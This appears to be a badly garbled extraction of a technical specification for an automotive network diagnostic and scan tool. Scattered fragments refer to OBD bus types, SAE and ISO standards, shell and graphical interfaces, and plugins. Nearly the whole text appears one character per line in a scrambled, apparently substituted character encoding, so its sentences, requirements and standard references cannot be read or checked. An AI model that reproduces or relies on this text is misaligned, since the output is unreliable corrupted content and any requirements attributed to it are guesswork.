J
µ
I
³
¯
q
e
_
¢
m
~
u
}
Z
e
`
e
U
e
W
S
r
T
W
W
j
Y
S
]
}
}
e
Z
`
Y
c
V
S
V
S
T
_
{
W
Y
W
T
j
Z
V
Z
R
}
Y
Z
}
Z
e
`
e
U
e
W
O
k
_
T
`
T
V
W
W
R
_
e
S
]
U
Q
}
Z
e
`
e
U
e
W
S
r
T
W
W
j
Y
S
]
}
}
e
Z
`
Y
c
O
ÿ
M
ÿ
¶
G
$
L
!
L
¯
«
µ
µ
¯
³
H
²
5
´
²
³
²
¯
`
e
c
e
^
]
U
Q
r
e
Z
s
_
Y
Y
c
Y
c
Q
Y
Z
Y
È
c
Y
£
_
Y
`
Q
T
S
t
]
_
U
`
T
e
_
V
W
T
`
R
`
e
c
e
U
e
^
}
]
`
Y
Q
e
Z
S
Y
}
e
r
Y
Z
`
e
c
e
t
]
Y
W
Y
U
e
_
e
^
R
U
V
W
U
´
²
³
²
`
e
c
e
í6
7
8
8
õ
ò
ó
ô
þ
ò
ý
ñ
ÿ°
ÿ
F
²
L
I
H
³
L
¸
²
&
´
I
H
²
³
²
&
¤
Q
Y
T
_
`
Y
Z
t
V
U
Y
U
e
_
£
{
]
Z
V
`
T
e
_
]
`
T
W
T
`
R
}
Z
e
v
T
c
Y
S
V
U
e
_
v
Y
_
T
Y
_
`
^
Y
`
Q
e
c
`
e
\
]
Y
Z
R
V
_
c
^
e
c
T
t
R
`
Q
Y
S
Y
`
`
T
_
{
S
t
e
Z
V
j
]
S
T
_
`
Y
Z
t
V
U
Y
O
p
W
W
e
t
`
Q
Y
S
Y
`
`
T
_
{
S
V
v
V
T
W
V
j
W
Y
V
`
`
Q
Y
T
_
`
Y
Z
t
V
U
Y
W
Y
v
Y
W
È
T
_
U
W
]
c
T
_
{
_
Y
`
r
e
Z
s
`
R
}
Y
V
_
c
S
}
Y
Y
c
V
_
c
T
_
T
`
T
V
W
T
V
`
T
e
_
`
R
}
Y
È
V
Z
Y
V
v
V
T
W
V
j
W
Y
O
ÿ°
ÿ
L
K
I
®
²
I
J
´
µ
¤
Q
Y
_
Y
`
r
e
Z
s
^
e
_
T
`
e
Z
}
Z
e
v
T
c
Y
S
`
Q
Y
V
j
T
W
T
`
R
`
e
V
_
V
W
R
Y
V
_
c
W
e
{
_
Y
`
r
e
Z
s
`
Z
V
)
U
O
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
U
e
_
_
Y
U
`
`
e
V
S
T
_
{
W
Y
j
]
S
V
_
c
c
]
^
}
_
Y
`
r
e
Z
s
`
Z
V
)
U
O
¤
Q
T
S
}
Z
e
{
Z
V
^
S
Q
V
W
W
c
Y
U
e
c
Y
V
_
c
c
T
S
}
W
V
R
_
Y
`
r
e
Z
s
`
Z
V
)
U
T
_
V
U
e
^
}
V
U
`
`
Y
¨
`
]
V
W
Z
Y
}
Z
Y
S
Y
_
`
V
`
T
e
_
È
W
e
{
_
Y
`
r
e
Z
s
`
Z
V
)
U
`
e
V
£
W
Y
T
_
V
t
e
Z
^
`
Q
V
`
U
V
_
j
Y
Z
Y
V
c
j
V
U
s
W
V
`
Y
Z
È
Z
Y
V
c
_
Y
`
r
e
Z
s
`
Z
V
)
U
t
Z
e
^
V
£
W
Y
S
V
v
Y
c
}
Z
Y
v
T
e
]
S
W
R
È
V
_
c
£
W
`
Y
Z
`
Z
V
)
U
c
T
S
}
W
V
R
Y
c
e
Z
W
e
{
{
Y
c
j
V
S
Y
c
e
_
V
]
S
Y
Z
S
]
}
}
W
T
Y
c
Y
¨
}
Z
Y
S
S
T
e
_
O
¤
Q
Y
c
Y
U
e
c
Y
c
}
V
U
s
Y
`
c
V
`
V
r
T
W
W
T
_
U
W
]
c
Y
È
r
Q
Y
Z
Y
V
}
}
W
T
U
V
j
W
Y
È
`
Q
Y
t
e
W
W
e
r
T
_
{
T
_
t
e
Z
¢
^
V
`
T
e
_
•
q
Y
`
r
e
Z
s
}
Z
e
`
e
U
e
W
]
S
Y
c
È
•
z
Y
V
c
Y
Z
T
_
t
e
Z
^
V
`
T
e
_
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
N
È
•
u
V
`
V
}
V
Z
V
^
Y
`
Y
Z
V
c
Æ
]
S
`
Y
c
v
V
W
]
Y
È
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
h
È
V
_
c
•
¥
Z
V
^
Y
k
u
^
Y
V
_
T
_
{
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
a
È
l
p
§
h
N
y
|
¢
n
O
h
N
ÿ°
ÿ
M
L
K
I
³
H
²
²
L
I
µ
I
L
9
H
µ
9
³
H
²
9
¤
Q
Y
_
Y
`
r
e
Z
s
S
U
V
_
_
Y
Z
`
e
e
W
}
Z
e
v
T
c
Y
S
`
Q
Y
V
j
T
W
T
`
R
`
e
Z
]
_
S
U
V
_
S
e
t
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
_
Y
`
r
e
Z
s
`
e
c
Y
`
Y
Z
^
T
_
Y
r
Q
V
`
c
Y
v
T
U
Y
S
V
Z
Y
V
v
V
T
W
V
j
W
Y
O
¤
Q
Y
S
U
V
_
_
Y
Z
r
T
W
W
V
`
`
Y
^
}
`
`
e
c
Y
`
Y
Z
^
T
_
Y
V
W
W
`
Q
Y
^
e
c
]
W
Y
S
}
Z
Y
S
Y
_
`
T
_
`
Q
Y
v
Y
Q
T
U
W
Y
È
V
_
c
T
c
Y
_
`
T
t
R
Y
V
U
Q
^
e
c
]
W
Y
V
S
^
]
U
Q
V
S
}
e
S
S
T
j
W
Y
O
ÿ°
ÿ°
L
K
I
0
:
µ
¯
I
H
²
.
¯
³
H
¤
Q
Y
_
Y
`
r
e
Z
s
Y
¨
}
W
e
Z
V
`
T
e
_
`
e
e
W
}
Z
e
v
T
c
Y
S
`
Q
Y
V
j
T
W
T
`
R
`
e
Z
Y
V
c
V
_
c
r
Z
T
`
Y
V
Z
j
T
`
Z
V
Z
R
c
V
`
V
e
_
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
_
Y
`
r
e
Z
s
O
u
V
`
V
Z
Y
U
Y
T
v
Y
c
e
_
S
`
V
_
c
V
Z
c
T
_
}
]
`
T
S
}
V
S
S
Y
c
`
e
`
Q
Y
_
Y
`
r
e
Z
s
V
_
c
c
V
`
V
t
Z
e
^
`
Q
Y
_
Y
`
r
e
Z
s
T
S
Z
Y
W
V
R
Y
c
j
V
U
s
e
_
S
`
V
_
c
V
Z
c
e
]
`
}
]
`
O
u
V
`
V
T
S
Y
S
U
V
}
Y
c
V
U
U
e
Z
c
T
_
{
`
e
`
Q
Y
m
~
u
e
v
Y
Z
S
`
Z
Y
V
^
}
Z
e
`
e
U
e
W
S
}
Y
U
T
£
Y
c
T
_
S
Y
U
`
T
e
_
h
O
N
O
h
`
e
}
Z
Y
S
Y
Z
v
Y
}
V
U
s
Y
`
j
e
]
_
c
V
Z
T
Y
S
O
ÿ°
ÿ
¶
³
H
²
.
¯
³
H
²
¯
;
:
³
H
²
¯
³
H
²
.
¯
5
´
²
³
²
H
¯
/
¤
Q
Y
S
U
V
_
`
e
e
W
}
Z
e
v
T
c
Y
S
S
U
V
_
`
e
e
W
t
]
_
U
`
T
e
_
V
W
T
`
R
V
S
S
}
Y
U
T
£
Y
c
j
R
l
p
§
N
y
|
O
p
U
U
e
Z
c
T
_
{
W
R
È
U
e
^
^
]
_
T
U
V
`
T
e
_
j
Y
`
r
Y
Y
_
`
Q
Y
S
U
V
_
`
e
e
W
V
_
c
`
Q
Y
v
Y
Q
T
U
W
Y
r
T
W
W
S
]
}
}
e
Z
`
•
p
]
`
e
^
V
`
T
U
c
Y
`
Y
Z
^
T
_
V
`
T
e
_
e
t
j
]
S
S
Y
S
}
Z
Y
S
Y
_
`
T
_
`
Q
Y
v
Y
Q
T
U
W
Y
t
Z
e
^
`
Q
Y
Q
V
Z
c
¢
r
V
Z
Y
T
_
`
Y
Z
t
V
U
Y
}
Z
Y
S
Y
_
`
È
•
o
e
^
}
W
Y
`
T
e
_
V
_
c
S
]
}
}
e
Z
`
e
t
e
_
¢
j
e
V
Z
c
S
R
S
`
Y
^
Z
Y
V
c
T
_
Y
S
S
`
Y
S
`
S
È
•
d
V
W
t
]
_
U
`
T
e
_
T
_
c
T
U
V
`
e
Z
W
T
{
Q
`
S
`
V
`
]
S
V
_
c
È
T
t
V
}
}
W
T
U
V
j
W
Y
È
Z
Y
V
S
e
_
e
Z
Z
Y
V
S
e
_
S
t
e
Z
T
W
W
]
^
T
_
V
`
T
e
_
È
•
m
j
`
V
T
_
T
_
{
V
_
c
c
T
S
}
W
V
R
T
_
{
Y
^
T
S
S
T
e
_
S
Z
Y
W
V
`
Y
c
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
È
V
_
c
•
m
j
`
V
T
_
T
_
{
V
_
c
c
T
S
}
W
V
R
T
_
{
Y
^
T
S
S
T
e
_
S
Z
Y
W
V
`
Y
c
U
]
Z
Z
Y
_
`
c
V
`
V
È
t
Z
Y
Y
Y
t
Z
V
^
Y
c
V
`
V
È
V
_
c
`
Y
S
`
}
V
Z
V
^
Y
`
Y
Z
S
V
_
c
Z
Y
S
]
W
`
S
O
b
Q
Y
Z
Y
`
Q
Y
S
U
V
_
`
e
e
W
T
S
e
_
W
R
S
}
Y
U
T
£
Y
c
`
e
S
]
}
}
e
Z
`
V
W
T
^
T
`
Y
c
Z
V
_
{
Y
e
t
c
T
V
{
_
e
S
`
T
U
}
Z
e
U
Y
c
]
Z
Y
S
È
`
Q
Y
S
U
V
_
`
e
e
W
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
j
Y
Y
¨
}
V
_
c
Y
c
`
e
}
Z
e
v
T
c
Y
`
Q
Y
t
]
W
W
Z
V
_
{
Y
e
t
S
T
^
T
W
V
Z
t
]
_
U
`
T
e
_
V
W
T
`
R
O
¥
e
Z
Y
¨
V
^
}
W
Y
È
V
W
W
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
È
V
_
c
V
W
W
t
Z
Y
Y
Y
t
Z
V
^
Y
c
V
`
V
V
_
c
`
Y
S
`
}
V
Z
V
^
Y
`
Y
Z
S
r
T
W
W
j
Y
S
]
}
}
e
Z
`
Y
c
È
_
e
`
e
_
W
R
`
Q
e
S
Y
Z
Y
W
V
`
Y
c
`
e
Y
^
T
S
S
T
e
_
S
U
e
_
`
Z
e
W
O
¤
Q
Y
]
S
Y
Z
T
_
`
Y
Z
t
V
U
Y
e
t
`
Q
Y
S
U
V
_
`
e
e
W
r
T
W
W
S
]
}
}
e
Z
`
V
W
T
_
Y
e
Z
T
Y
_
`
Y
c
`
Y
¨
`
T
_
`
Y
Z
t
V
U
Y
V
_
c
V
{
Z
V
}
Q
T
U
V
W
T
_
`
Y
Z
t
V
U
Y
^
e
c
Y
O
.
L
:
´
H
¯
<
L
I
²
L
I
H
³
L
¤
Q
Y
`
Y
¨
`
]
V
W
]
S
Y
Z
T
_
`
Y
Z
t
V
U
Y
`
e
`
Q
Y
S
U
V
_
`
e
e
W
r
T
W
W
j
Y
W
T
_
Y
e
Z
T
Y
_
`
Y
c
O
¥
]
_
U
`
T
e
_
V
W
T
`
R
`
Q
V
`
r
e
]
W
c
j
Y
V
r
s
r
V
Z
c
r
T
`
Q
V
`
Y
¨
`
c
T
S
}
W
V
R
È
S
]
U
Q
V
S
{
Z
V
}
Q
T
_
{
V
_
c
U
e
_
`
T
_
]
e
]
S
W
R
]
}
c
V
`
Y
c
Z
Y
S
]
W
`
S
È
r
T
W
W
_
e
`
j
Y
S
]
}
}
e
Z
`
Y
c
r
T
`
Q
`
Q
T
S
T
_
`
Y
Z
t
V
U
Y
O
h
h
I
H
µ
³
H
¯
<
L
I
²
L
I
H
³
L
¤
Q
Y
{
Z
V
}
Q
T
U
V
W
]
S
Y
Z
T
_
`
Y
Z
t
V
U
Y
`
e
`
Q
Y
S
U
V
_
`
e
e
W
r
T
W
W
}
Z
e
v
T
c
Y
V
S
T
^
}
W
Y
È
T
_
`
]
T
`
T
v
Y
T
_
`
Y
Z
t
V
U
Y
`
e
`
Q
Y
U
e
^
^
e
_
S
U
V
_
`
e
e
W
t
]
_
U
`
T
e
_
S
O
¤
Q
Y
S
U
V
_
`
e
e
W
r
T
_
c
e
r
r
T
W
W
}
Z
e
v
T
c
Y
T
U
e
_
S
t
e
Z
T
_
T
`
T
V
`
T
_
{
U
e
^
^
V
_
c
S
S
U
V
_
`
e
e
W
U
e
^
¢
^
V
_
c
S
O
[
Y
S
]
W
`
S
r
T
W
W
j
Y
c
T
S
}
W
V
R
Y
c
V
W
}
Q
V
_
]
^
Y
Z
T
U
V
W
W
R
e
Z
{
Z
V
}
Q
T
U
V
W
W
R
T
_
`
Q
Y
S
V
^
Y
r
T
_
c
e
r
O
u
T
S
}
W
V
R
T
_
{
^
]
W
`
T
}
W
Y
Z
Y
S
]
W
`
S
r
T
W
W
j
Y
S
]
}
}
e
Z
`
Y
c
O
¤
Q
Y
]
S
Y
Z
r
T
W
W
j
Y
V
j
W
Y
S
Y
¢
W
Y
U
`
r
Q
Y
`
Q
Y
Z
e
Z
_
e
`
Z
Y
S
]
W
`
S
V
Z
Y
U
e
_
`
T
_
]
e
]
S
W
R
]
}
c
V
`
Y
c
O
¤
Q
Y
]
S
Y
Z
^
V
R
V
W
S
e
T
_
T
`
T
V
`
Y
V
_
]
}
c
V
`
Y
e
t
V
Z
Y
S
]
W
`
v
V
W
]
Y
O
ÿ°
ÿ
=
¬
®
H
²
²
H
²
²
¤
Q
Y
m
`
`
e
d
V
_
_
`
e
e
W
}
Z
e
v
T
c
Y
S
Q
T
{
Q
W
Y
v
Y
W
U
e
_
`
Z
e
W
V
_
c
^
e
_
T
`
e
Z
T
_
{
e
t
v
Y
Q
T
U
W
Y
}
V
¢
Z
V
^
Y
`
Y
Z
S
v
T
V
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
j
]
S
O
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
}
Z
e
v
T
c
Y
j
e
`
Q
`
Y
¨
`
V
_
c
{
Z
V
}
Q
T
U
V
W
T
_
`
Y
Z
t
V
U
Y
S
O
L
¯
¯
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
U
e
_
`
V
T
_
V
`
Y
¨
`
j
V
S
Y
c
U
e
^
^
V
_
c
W
T
_
Y
T
_
`
Y
Z
t
V
U
Y
O
¤
Q
T
S
T
_
`
Y
Z
t
V
U
Y
r
T
W
W
V
W
W
e
r
`
Q
Y
]
S
Y
Z
`
e
T
_
T
`
T
V
`
Y
U
e
^
^
V
_
c
S
`
e
`
Q
Y
V
}
}
W
T
U
V
`
T
e
_
fV
_
c
È
c
Y
¢
}
Y
_
c
T
_
{
e
_
`
Q
Y
U
e
^
^
V
_
c
È
Z
Y
\
]
Y
S
`
S
e
_
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
j
]
S
g
O
¤
Q
T
S
T
_
`
Y
Z
t
V
U
Y
r
T
W
W
V
W
S
e
V
W
W
e
r
È
r
Q
Y
Z
Y
V
}
}
W
T
U
V
j
W
Y
È
Z
Y
`
]
Z
_
e
t
V
W
}
Q
V
_
]
^
Y
Z
T
U
Z
Y
S
]
W
`
S
e
t
U
e
^
^
V
_
c
S
O
¤
Q
Y
S
Q
Y
W
W
T
_
`
Y
Z
t
V
U
Y
T
S
V
_
T
_
`
Z
T
_
S
T
U
}
V
Z
`
e
t
`
Q
Y
V
}
}
W
T
U
V
`
T
e
_
Ç
T
`
T
S
_
e
`
e
}
`
T
e
_
V
W
V
S
V
}
W
]
{
T
_
O
²
J
K
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
}
Z
e
v
T
c
Y
{
Z
V
}
Q
T
U
r
T
_
c
e
r
S
t
e
Z
{
Z
V
}
Q
T
U
V
W
V
U
U
Y
S
S
`
e
S
T
^
T
W
V
Z
t
]
_
U
`
T
e
_
V
W
T
`
R
V
v
V
T
W
V
j
W
Y
`
Q
Z
e
]
{
Q
`
Q
Y
S
Q
Y
W
W
O
¤
Q
T
S
t
]
_
U
`
T
e
_
V
W
T
`
R
T
_
U
W
]
c
Y
S
S
U
V
_
`
e
e
W
U
e
^
^
V
_
c
S
V
_
c
Z
Y
S
]
W
`
S
V
S
r
Y
W
W
V
S
U
e
_
£
{
]
Z
V
`
T
e
_
e
t
`
Q
Y
V
}
}
W
T
U
V
`
T
e
_
V
_
c
U
e
_
£
{
]
Z
V
`
T
e
_
e
t
}
W
]
{
T
_
S
O
«
²
H
¯
/
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
}
Z
e
v
T
c
Y
V
]
{
^
Y
_
`
Y
c
v
Y
Q
T
U
W
Y
e
}
Y
Z
V
`
T
e
_
t
V
U
T
W
T
`
T
Y
S
O
¤
Q
Y
S
Y
t
V
U
T
W
T
`
T
Y
S
r
T
W
W
j
Y
V
v
V
T
W
V
j
W
Y
V
S
U
e
^
^
V
_
c
S
`
e
`
Q
Y
S
Q
Y
W
W
È
V
_
c
Z
Y
S
]
W
`
S
r
T
W
W
j
Y
V
v
V
T
W
V
j
W
Y
`
e
{
Z
V
}
Q
T
U
V
W
V
_
c
V
W
}
Q
V
_
]
^
Y
Z
T
U
Z
Y
S
]
W
`
}
W
]
{
T
_
S
O
¤
Q
Y
t
V
U
T
W
T
`
T
Y
S
}
Z
e
v
T
c
Y
c
T
_
U
W
]
c
Y
•
§
S
`
T
^
V
`
Y
c
}
e
r
Y
Z
U
V
W
U
]
W
V
`
T
e
_
f
c
R
_
V
^
e
^
Y
`
Y
Z
g
È
•
¥
]
Y
W
Y
U
e
_
e
^
R
U
V
W
U
]
W
V
`
T
e
_
È
T
_
U
W
]
c
T
_
{
^
e
v
T
_
{
V
v
Y
Z
V
{
Y
t
]
Y
W
U
e
_
S
]
^
}
`
T
e
_
V
_
c
Y
S
`
T
^
V
`
Y
c
c
T
S
`
V
_
U
Y
t
e
Z
Z
Y
^
V
T
_
T
_
{
t
]
Y
W
È
•
b
Q
Y
Y
W
S
}
Y
Y
c
V
_
c
S
W
T
}
c
T
S
}
W
V
R
È
V
_
c
•
p
~
l
V
_
c
§
¤
o
V
U
`
T
v
T
`
R
O
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
}
Z
e
v
T
c
Y
V
U
e
_
£
{
]
Z
V
j
W
Y
t
V
U
T
W
T
`
R
`
e
Z
Y
U
e
^
^
Y
_
c
}
Z
e
}
Y
Z
v
Y
Q
T
U
W
Y
e
}
Y
Z
V
`
T
e
_
}
Z
e
U
Y
c
]
Z
Y
S
O
¤
Q
Y
S
Y
}
Z
e
U
Y
c
]
Z
Y
S
r
T
W
W
T
_
U
W
]
c
Y
•
z
Y
V
c
W
T
{
Q
`
S
e
}
Y
Z
V
`
T
e
_
V
S
U
e
^
}
V
Z
Y
c
`
e
S
]
_
Z
T
S
Y
V
_
c
S
Y
`
`
T
^
Y
V
_
c
e
]
`
S
T
c
Y
j
Z
T
{
Q
`
_
Y
S
S
È
•
u
e
e
Z
}
e
S
T
`
T
e
_
V
S
U
e
^
}
V
Z
Y
c
`
e
v
Y
Q
T
U
W
Y
S
}
Y
Y
c
È
•
u
e
e
Z
W
e
U
s
S
V
S
U
e
^
}
V
Z
Y
c
`
e
v
Y
Q
T
U
W
Y
S
}
Y
Y
c
È
V
_
c
•
b
T
}
Y
Z
e
}
Y
Z
V
`
T
e
_
V
S
U
e
^
}
V
Z
Y
c
`
e
Q
Y
V
c
W
T
{
Q
`
e
}
Y
Z
V
`
T
e
_
O
h
a
0
:
L
²
J
L
J
¸
H
²
J
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
V
W
W
e
r
Y
¨
`
Y
_
c
Y
c
U
e
_
`
Z
e
W
e
v
Y
Z
v
Y
¢
Q
T
U
W
Y
S
t
]
_
U
`
T
e
_
S
È
T
_
U
W
]
c
T
_
{
•
u
T
S
V
j
W
Y
p
~
l
©
§
¤
o
t
]
_
U
`
T
e
_
V
W
T
`
R
È
V
_
c
•
d
V
_
]
V
W
U
e
_
`
Z
e
W
e
t
p
~
l
©
§
¤
o
e
}
Y
Z
V
`
T
e
_
e
_
V
}
Y
Z
r
Q
Y
Y
W
È
}
Y
Z
V
¨
W
Y
È
e
Z
}
Y
Z
S
T
c
Y
j
V
S
T
S
O
¹
¯
´
²
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
S
]
}
}
e
Z
`
V
}
W
]
{
T
_
^
Y
`
Q
e
c
r
Q
Y
Z
Y
j
R
e
}
`
T
e
_
V
W
t
]
_
U
¢
`
T
e
_
V
W
T
`
R
U
V
_
j
Y
T
^
}
W
Y
^
Y
_
`
Y
c
S
Y
}
V
Z
V
`
Y
t
Z
e
^
`
Q
Y
^
V
T
_
V
}
}
W
T
U
V
`
T
e
_
O
¤
Q
Y
}
W
]
{
T
_
V
Z
U
Q
T
`
Y
U
`
]
Z
Y
r
T
W
W
V
W
W
e
r
V
}
W
]
{
T
_
`
e
S
]
}
}
e
Z
`
e
_
Y
e
Z
^
e
Z
Y
e
t
`
Q
Y
t
e
W
W
e
r
T
_
{
t
V
U
T
W
T
`
T
Y
S
U
e
^
^
V
_
c
V
_
c
Z
Y
S
]
W
`
O
P
W
]
{
T
_
S
r
T
W
W
j
Y
V
W
W
e
r
Y
c
`
Q
Y
V
j
T
W
T
`
R
`
e
Q
V
v
Y
^
e
Z
Y
`
Q
V
_
e
_
Y
T
_
S
`
V
_
U
Y
e
t
`
Q
Y
}
W
]
{
T
_
V
U
`
T
v
Y
V
`
e
_
Y
`
T
^
Y
O
¤
Q
T
S
r
T
W
W
V
W
W
e
r
`
r
e
e
Z
^
e
Z
Y
c
T
ë
Y
Z
Y
_
`
}
W
]
{
T
_
U
e
_
£
{
]
Z
V
`
T
e
_
S
t
e
Z
V
S
T
_
{
W
Y
}
W
]
{
T
_
`
e
j
Y
V
U
`
T
v
Y
V
`
e
_
Y
`
T
^
Y
O
¤
Q
Y
t
e
W
W
e
r
T
_
{
S
`
V
_
c
V
Z
c
}
W
]
{
T
_
S
r
T
W
W
j
Y
T
^
}
W
Y
^
Y
_
`
Y
c
•
*
N
N
r
T
_
c
e
r
È
}
Z
e
v
T
c
T
_
{
V
`
Q
Y
^
V
j
W
Y
{
Z
V
}
Q
T
U
c
T
S
}
W
V
R
e
t
c
V
`
V
È
•
p
]
c
T
e
e
]
`
È
}
Z
e
v
T
c
T
_
{
V
_
V
]
c
T
j
W
Y
e
]
`
}
]
`
e
t
c
V
`
V
V
S
S
e
]
_
c
Y
ë
Y
U
`
S
e
Z
`
Y
¨
`
`
e
S
}
Y
Y
U
Q
È
•
~
T
`
^
V
}
e
]
`
}
]
`
È
}
Z
e
v
T
c
T
_
{
`
Q
Y
V
j
T
W
T
`
R
`
e
r
Z
T
`
Y
S
`
V
`
T
U
{
Z
V
}
Q
T
U
V
W
Z
Y
}
Z
Y
S
Y
_
`
V
¢
`
T
e
_
e
t
c
V
`
V
`
e
V
£
W
Y
È
•
¥
T
t
e
U
e
_
`
Z
e
W
È
}
Z
e
v
T
c
T
_
{
V
_
T
_
`
Y
Z
t
V
U
Y
S
T
^
T
W
V
Z
`
e
`
Q
Y
S
Q
Y
W
W
T
_
`
Y
Z
t
V
U
Y
e
_
V
W
e
U
V
W
£
W
Y
S
R
S
`
Y
^
£
t
e
È
V
_
c
•
§
¨
`
Y
Z
_
V
W
}
Z
e
{
Z
V
^
È
}
Z
e
v
T
c
T
_
{
`
Q
Y
V
j
T
W
T
`
R
`
e
Z
]
_
V
_
V
Z
j
T
`
Z
V
Z
R
}
Z
e
{
Z
V
^
j
V
S
Y
c
e
_
U
e
_
£
{
]
Z
V
j
W
Y
Y
v
Y
_
`
S
O
>
?
#
@
A
A
ç
D
À
$
H
/
L
I
F
P
Q
R
S
T
U
V
W
W
V
R
Y
Z
È
c
Y
£
_
Y
c
T
_
l
p
§
N
|
w
¡
t
e
Z
i
P
b
V
_
c
P
b
d
È
T
_
k
l
m
N
n
N
¢
N
È
k
l
m
N
n
h
a
¡
¢
N
t
e
Z
k
l
m
È
V
_
c
T
_
l
p
§
h
h
|
n
t
e
Z
o
p
q
O
$
H
/
L
I
u
V
`
V
X
T
_
s
W
V
R
Y
Z
È
c
Y
£
_
Y
c
T
_
l
p
§
N
|
w
¡
t
e
Z
i
P
b
V
_
c
P
b
d
È
T
_
k
l
m
N
n
N
¢
h
È
k
l
m
N
n
h
a
¡
¢
h
t
e
Z
k
l
m
È
V
_
c
T
_
l
p
§
h
h
|
n
t
e
Z
o
p
q
O
$
H
/
L
I
M
q
Y
`
r
e
Z
s
W
V
R
Y
Z
È
c
Y
£
_
Y
c
T
_
l
p
§
h
N
y
|
¢
N
È
l
p
§
h
N
y
|
¢
h
È
l
p
§
h
N
y
|
¢
a
È
l
p
§
h
N
y
|
¢
n
O
$
H
/
L
I
°
¤
Z
V
_
S
}
e
Z
`
W
V
R
Y
Z
È
_
e
`
c
Y
£
_
Y
c
j
R
l
p
§
e
Z
k
l
m
O
$
H
/
L
I
¶
l
Y
S
S
T
e
_
W
V
R
Y
Z
È
_
e
`
c
Y
£
_
Y
c
j
R
l
p
§
e
Z
k
l
m
O
$
H
/
L
I
=
P
Z
Y
S
Y
_
`
V
`
T
e
_
W
V
R
Y
Z
È
_
e
`
c
Y
£
_
Y
c
j
R
l
p
§
e
Z
k
l
m
O
$
H
/
L
I
B
p
}
}
W
T
U
V
`
T
e
_
W
V
R
Y
Z
È
c
Y
£
_
Y
c
T
_
l
p
§
h
N
y
|
¢
N
È
l
p
§
h
N
y
|
¢
h
È
l
p
§
h
N
y
|
¢
a
È
l
p
§
h
N
y
|
¢
n
t
e
Z
i
P
b
V
_
c
P
b
d
È
V
_
c
T
_
k
l
m
N
n
h
a
¡
¢
a
t
e
Z
k
l
m
O
h
n
C
@
B
C
D
Ã
¼
¾
D
D
ê
¾
Ã
ç
æ
¾
Ã
D
#
E
Á
Á
A
Ã
C
`
e
c
e
Z
Y
t
Y
Z
Y
_
U
Y
V
W
W
c
Y
v
T
U
Y
S
^
Y
_
`
T
e
_
Y
c
j
R
t
Z
Y
Y
c
T
V
{
È
e
_
e
}
Y
_
c
T
V
{
V
_
c
e
`
Q
Y
Z
W
T
S
`
S
F
í
ì
û
8
8
ø
þ
÷
÷
ò
ó
÷
ñ
_
e
_
Y
R
Y
`
G
F
í
H
ý
ñ
û
8
8
ø
þ
÷
÷
ò
ó
÷
ñ
¬
µ
L
²
¬
L
!
³
L
u
Y
v
T
U
Y
S
c
Y
£
_
Y
c
j
R
`
Q
Y
m
}
Y
_
m
`
`
e
P
Z
e
Æ
Y
U
`
O
L
I
H
¯
l
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
k
l
m
È
V
_
c
o
p
q
¦
j
]
S
`
R
}
Y
S
O
¹
H
I
H
¯
¯
L
¯
l
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
k
l
m
È
V
_
c
o
p
q
¦
j
]
S
`
R
}
Y
S
O
¹
¬
l
]
}
}
e
Z
`
c
Y
}
Y
_
c
S
e
_
}
Z
e
U
Y
S
S
e
Z
}
Y
Z
t
e
Z
^
V
_
U
Y
O
®
³
I
³
²
I
¯
¯
L
I
l
]
}
}
e
Z
`
c
Y
}
Y
_
c
S
e
_
^
T
U
Z
e
U
e
_
`
Z
e
W
W
Y
Z
}
Y
Z
t
e
Z
^
V
_
U
Y
V
_
c
£
Z
^
r
V
Z
Y
O
¹
I
I
H
H
¯
L
G
H
I
J
K
H
I
L
l
]
}
}
e
Z
`
c
Y
}
Y
_
c
S
e
_
Q
V
Z
c
r
V
Z
Y
}
Y
Z
t
e
Z
^
V
_
U
Y
V
_
c
£
Z
^
r
V
Z
Y
O
L
!
L
¯
µ
L
²
±
H
I
J
l
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
k
l
m
È
V
_
c
o
p
q
¦
j
]
S
`
R
}
Y
S
O
«
²
J
/
H
L
I
k
_
`
Y
Z
t
V
U
Y
S
U
Q
Y
^
V
`
T
U
`
Q
V
`
S
]
}
}
e
Z
`
S
k
l
m
j
]
S
`
R
}
Y
O
±
ÿ
H
J
H
²
o
e
^
}
W
Y
`
Y
c
Y
v
T
U
Y
`
Q
V
`
S
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
V
_
c
k
l
m
j
]
S
`
R
}
Y
S
O
I
L
J
:
²
k
_
`
Y
Z
t
V
U
Y
S
U
Q
Y
^
V
`
T
U
`
Q
V
`
S
]
}
}
e
Z
`
S
k
l
m
j
]
S
`
R
}
Y
O
0
$
®
M
:
:
k
_
`
Y
Z
t
V
U
Y
k
o
S
`
Q
V
`
S
]
}
}
e
Z
`
i
P
b
È
P
b
d
È
V
_
c
©
e
Z
k
l
m
j
]
S
`
R
}
Y
S
È
c
Y
¢
}
Y
_
c
T
_
{
e
_
^
e
c
Y
W
O
®
´
¯
µ
¯
L
:
0
²
²
L
L
I
²
o
e
^
}
W
Y
`
Y
c
Y
v
T
U
Y
S
`
Q
V
`
S
]
}
}
e
Z
`
i
P
b
È
P
b
d
È
V
_
c
©
e
Z
k
l
m
j
]
S
`
R
}
Y
S
È
c
Y
}
Y
_
c
T
_
{
e
_
^
e
c
Y
W
O
®
/
J
³
k
_
`
Y
Z
t
V
U
Y
k
o
`
Q
V
`
S
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
k
l
m
